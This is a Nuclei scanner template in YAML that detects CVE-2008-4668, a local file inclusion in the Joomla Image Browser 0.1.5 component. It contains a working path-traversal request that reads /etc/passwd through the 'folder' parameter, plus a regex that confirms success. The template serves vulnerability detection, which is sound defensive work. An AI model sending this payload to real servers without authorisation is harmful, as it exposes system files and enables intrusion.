46 lines
1.8 KiB
YAML
46 lines
1.8 KiB
YAML
id: CVE-2008-4668
|
|
|
|
info:
|
|
name: Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion
|
|
author: daffainfo
|
|
severity: critical
|
|
description: Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
|
|
remediation: |
|
|
Upgrade to a patched version of Joomla! Image Browser or apply the necessary security patches to mitigate the LFI vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/6618
|
|
- http://securityreason.com/securityalert/4464
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2008-4668
|
|
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45490
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:P/A:P
|
|
cvss-score: 9
|
|
cve-id: CVE-2008-4668
|
|
cwe-id: CWE-22
|
|
epss-score: 0.01018
|
|
epss-percentile: 0.83418
|
|
cpe: cpe:2.3:a:joomla:com_imagebrowser:0.1.5:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: joomla
|
|
product: com_imagebrowser
|
|
tags: cve2008,cve,joomla,lfi,edb
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a00463044022063b96588b6252e04e12101a7ef9a2744b1ad191e0f2e42b4cea08a43b7e42f35022057a31c495c450ec89adc4ad386b5203ac3b15d93fe5224986eb90f9b47ca4967:922c64590222798bb761d5b6d8e72950 |